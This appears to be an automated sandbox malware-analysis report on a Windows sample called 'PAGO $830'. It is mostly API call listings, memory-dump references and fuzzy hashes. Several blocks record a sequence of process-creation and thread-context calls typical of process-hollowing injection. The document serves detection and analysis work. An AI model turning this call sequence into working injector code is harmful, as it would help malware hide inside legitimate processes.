                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                                          • Instruction ID: fe01f4ec410dfe121f04092f17d9381035582281d4201b1bca85e748e61197cc
                                                          • Opcode Fuzzy Hash: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                                          • Instruction Fuzzy Hash: B6117C71520608FFDB208F64EC85EAFBBB8EF40740B108629F809E7114E271AE44DB60

                                                          Control-flow Graph
                                                          • Graph rendering omitted (extracted as raw node/edge text). Recoverable content: basic blocks 13bfcf8 through 13c08bb, entry block 13bfcf8-13bfd98, with calls to CreateProcessW (block 13c048b-13c04b8), Wow64GetThreadContext (block 13c0534-13c054e), ReadProcessMemory (block 13c0555-13c0570) and Wow64SetThreadContext (block 13c07e0-13c07ff), plus internal subcalls to 13c2188, 13c1808, 13c1948, 13c1758, 13c21a8, 13c1358 and 13c1688. The Executed / Not Executed colouring of the original graph is not preserved in the extracted text.
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 013C04B3
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C0549
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C056B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                          • Instruction ID: aaa5fb9191f575636bde592e3a5d28d9305cc78e040c70ef8217de6da2f692af
                                                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                          • Instruction Fuzzy Hash: 39621A34A14258DBEB24CFA4C840BDEB776EF58704F1091A9E20DEB390E7759E81CB59
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB40D9
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D7588F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                          • String ID: Line:
                                                          • API String ID: 2289894680-1585850449
                                                          • Opcode ID: a3e7f16cbba2e10fde25a3828fba37fe73ebaee255ee6b9b2cad2a586ef1268f
                                                          • Instruction ID: 72e71264cafffdafb858d2b5a6b242eb3297f884243a4d254f355d5717e85083
                                                          • Opcode Fuzzy Hash: a3e7f16cbba2e10fde25a3828fba37fe73ebaee255ee6b9b2cad2a586ef1268f
                                                          • Instruction Fuzzy Hash: AD31C271408304AFC720EB20EC45BDB77D8EB55710F14892EF69992092EBB09689CBB3
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00D905E8
                                                            • Part of subcall function 00D93234: RaiseException.KERNEL32(?,?,?,00D9060A,?,00000001,?,?,?,?,?,?,00D9060A,?,00E38748), ref: 00D93294
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90605
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Unknown exception
                                                          • API String ID: 3476068407-410509341
                                                          • Opcode ID: a58f10dffa63a5b3340a1f74cc59922aa96929bc0d819fcabfe325420e4bf32e
                                                          • Instruction ID: 3ec9f1a1877f68792db737f69e32b595d103633cd9fe25dec00bb03ea40bd7bc
                                                          • Opcode Fuzzy Hash: a58f10dffa63a5b3340a1f74cc59922aa96929bc0d819fcabfe325420e4bf32e
                                                          • Instruction Fuzzy Hash: 74F0622490030DBBCF54B764E846D9E7F6C9E00710B644571B924E6492EB71DA56CAF4
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DE2F4D
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DE2F62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 03598b74687256107980a2315556f19e8c98795b764ece90632787f74d3fcb76
                                                          • Instruction ID: b1bb78117a44fc0548201670e9e8b1512e63724cd9ce27d9451a1c432b4bb8d0
                                                          • Opcode Fuzzy Hash: 03598b74687256107980a2315556f19e8c98795b764ece90632787f74d3fcb76
                                                          • Instruction Fuzzy Hash: 7FD05E72500328BBDA60A7A59C0EFCB3A6CDB04750F1002A1B655F20E1DAB0A988CAA0
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DF821C
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00DF8223
                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DF8404
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                          • String ID:
                                                          • API String ID: 146820519-0
                                                          • Opcode ID: 2dc2a5d03a030e769d9ccf3ba14a1a3e2305bc3c3c38226bee78ce7b64d2ef2e
                                                          • Instruction ID: 0e1690362a5dd6433d65c7dcdb9b1bdf380290ae80446c2993197ce490d87469
                                                          • Opcode Fuzzy Hash: 2dc2a5d03a030e769d9ccf3ba14a1a3e2305bc3c3c38226bee78ce7b64d2ef2e
                                                          • Instruction Fuzzy Hash: 97127D71A083459FC714DF28C484B6ABBE5FF88314F09C95DE9898B352DB31E945CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dde6b6f947feff12976ecdd74db1a49ceed3148584b40fe4234affee06505ac0
                                                          • Instruction ID: f59d9ba0c85ac904493bb45912b5bd032c181ef4ebb468f9ef4a698964037396
                                                          • Opcode Fuzzy Hash: dde6b6f947feff12976ecdd74db1a49ceed3148584b40fe4234affee06505ac0
                                                          • Instruction Fuzzy Hash: 0D51B275E01609AFCF10AFA9E845FAEBBB4EF47324F180159F404A7295D7749901CB71
                                                          APIs
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D734FF
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D73507
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D73512
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D7351D
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D73525
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7352D
                                                            • Part of subcall function 00D73455: RegisterWindowMessageW.USER32(00000004,?,00D72BCF), ref: 00D734AD
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D72C75
                                                          • OleInitialize.OLE32 ref: 00D72C93
                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00DB3037
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID:
                                                          • API String ID: 1986988660-0
                                                          • Opcode ID: 6ba78bfa906b9cf968be06b794ebe61e542e8c40d5af3d66ca811ae841c7b682
                                                          • Instruction ID: 15920a8237325d0c8d2cef25389941c30a8cb7fcefca93f3b958c4b4a4a81d8f
                                                          • Opcode Fuzzy Hash: 6ba78bfa906b9cf968be06b794ebe61e542e8c40d5af3d66ca811ae841c7b682
                                                          • Instruction Fuzzy Hash: 6E7183B89113408ECB88DF7BE9466953AE0F7CA34475492EAD01AF7261E73844CACF65
                                                          APIs
                                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,00DA856C,?,00E38CD8,0000000C), ref: 00DA86A4
                                                          • GetLastError.KERNEL32(?,00DA856C,?,00E38CD8,0000000C), ref: 00DA86AE
                                                          • __dosmaperr.LIBCMT ref: 00DA86D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2583163307-0
                                                          • Opcode ID: 1537165816ee2496eb840b640188896eb96e417ba4b77ac8cbf0724e1d7778aa
                                                          • Instruction ID: df5002d1be989cc2d81cbf3cc23c8b0a8f72b32fa9e6a295f44ab6d806c9f503
                                                          • Opcode Fuzzy Hash: 1537165816ee2496eb840b640188896eb96e417ba4b77ac8cbf0724e1d7778aa
                                                          • Instruction Fuzzy Hash: 7301D633A046602EF7282334A845B7E67499B93B74F3D0269FD199B1D2DEB1DC85A1B0
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DE2BF2,?,?,?,00000004,00000001), ref: 00DE2F10
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DE2BF2,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2F24
                                                          • CloseHandle.KERNEL32(00000000,?,00DE2BF2,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2F2B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: c956b377b77cf28ab47c2f901724df4e61f2c9aa21030a24a25171cce72a1210
                                                          • Instruction ID: f5eb14715d9c0e2653edad3436de59bb7207ee79da717d2361bd9a36968b8168
                                                          • Opcode Fuzzy Hash: c956b377b77cf28ab47c2f901724df4e61f2c9aa21030a24a25171cce72a1210
                                                          • Instruction Fuzzy Hash: 7BE086322812147BD6312757AC0EF8B3A2CDB86B75F244310FB58750D086A2154542A8
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D830F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: CALL
                                                          • API String ID: 1385522511-4196123274
                                                          • Opcode ID: 4299a5cd9ac28f41d87c5924b0ce4d0e27f50961b1d231d60b41fe43fd4621ac
                                                          • Instruction ID: 8fdde4494ea180ad7435e73c06346de8dae585097459e9eeed118080c9dae1fe
                                                          • Opcode Fuzzy Hash: 4299a5cd9ac28f41d87c5924b0ce4d0e27f50961b1d231d60b41fe43fd4621ac
                                                          • Instruction Fuzzy Hash: 19226A706083429FC714EF14C884B2ABBF1FF85314F18895DF59A9B2A1D771E945CBA2
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DE6E89
                                                            • Part of subcall function 00D7686D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7689F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad_wcslen
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 3312870042-2806939583
                                                          • Opcode ID: 5a8b7387c47b6999be2ffd5902003d55222c990d8195a3bcb0aa8c260dba3fbb
                                                          • Instruction ID: 1809a02b943437ab9bb7e1e9c928cb8ae6dcf8aca6edbb61741851dc88374254
                                                          • Opcode Fuzzy Hash: 5a8b7387c47b6999be2ffd5902003d55222c990d8195a3bcb0aa8c260dba3fbb
                                                          • Instruction Fuzzy Hash: 43B18F311087418FCB14EF21C89196EB7E5EF94350F44885DF89A972A2EB70ED49CBB2
                                                          APIs
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00DB386E
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                            • Part of subcall function 00D747D0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D747EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen
                                                          • String ID: X
                                                          • API String ID: 779396738-3081909835
                                                          • Opcode ID: ea15c5ed845d72cfce4aa155f08663d2b58c6e9f6740bfc9ee5675c53f1887ca
                                                          • Instruction ID: 31c32b88ba39e782812f51861ace0dd97d9ae87d949b3259d097623d3f747c64
                                                          • Opcode Fuzzy Hash: ea15c5ed845d72cfce4aa155f08663d2b58c6e9f6740bfc9ee5675c53f1887ca
                                                          • Instruction Fuzzy Hash: B8218171A00298AEDB019F94D805BEE7BF9AF49314F008059E519B7241EBB49A89CF71
                                                          APIs
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D75793
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_
                                                          • String ID:
                                                          • API String ID: 1144537725-0
                                                          • Opcode ID: afc0bb817f90a3cae7f1c0cec9cc67e2f50b3c84d886891907fec49e0888baa9
                                                          • Instruction ID: 5827febec613d4c762d94c39edfec9ed1c24e47e712387fedb2a78acac131136
                                                          • Opcode Fuzzy Hash: afc0bb817f90a3cae7f1c0cec9cc67e2f50b3c84d886891907fec49e0888baa9
                                                          • Instruction Fuzzy Hash: 06319E74504701CFD720EF35E884797BBE8FB49708F04092EE5DA93240E7B1A988CBA2
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00D736AD
                                                            • Part of subcall function 00D73656: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D7366B
                                                            • Part of subcall function 00D73656: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D73682
                                                            • Part of subcall function 00D7445D: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D736D8,?), ref: 00D7448D
                                                            • Part of subcall function 00D7445D: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D736D8,?), ref: 00D744A0
                                                            • Part of subcall function 00D7445D: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E41418,00E41400,?,?,?,?,?,?,00D736D8,?), ref: 00D74515
                                                            • Part of subcall function 00D7445D: SetCurrentDirectoryW.KERNEL32(?,00000001,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00D74596
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D736E7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                          • String ID:
                                                          • API String ID: 1550534281-0
                                                          • Opcode ID: 6f65156a49e7663a506bc0c21ceea692e022e6ee794512765e8a0c606726ec05
                                                          • Instruction ID: f2f270163831231442185464c01ba4ec1dfaa8b12793b5185d5c4e93b446762a
                                                          • Opcode Fuzzy Hash: 6f65156a49e7663a506bc0c21ceea692e022e6ee794512765e8a0c606726ec05
                                                          • Instruction Fuzzy Hash: 84F0BE39554344AFEB006FA2FC0BB2937A4E702B05F048546F208795E3EBB2909A9B60
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 013C04B3
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C0549
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C056B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction ID: 5eb900dfd5a16f462fc755d2c5b4fb03231fb642aa3dce135c7f76df449f2b02
                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction Fuzzy Hash: CA12DE24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: c50e4c454dbe61f9717a30b72fe5b9e64c147048fafdcfc584d061d6d770307a
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 9731E971A00109DBC718EF58D4C4969F7A6FF89300B6886A5E849CB755D731EEC1DBE0
                                                          APIs
                                                            • Part of subcall function 00D76832: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7683E
                                                            • Part of subcall function 00D76832: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D76850
                                                            • Part of subcall function 00D76832: FreeLibrary.KERNEL32(00000000,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76862
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7689F
                                                            • Part of subcall function 00D767FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76804
                                                            • Part of subcall function 00D767FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D76816
                                                            • Part of subcall function 00D767FB: FreeLibrary.KERNEL32(00000000,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76829
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
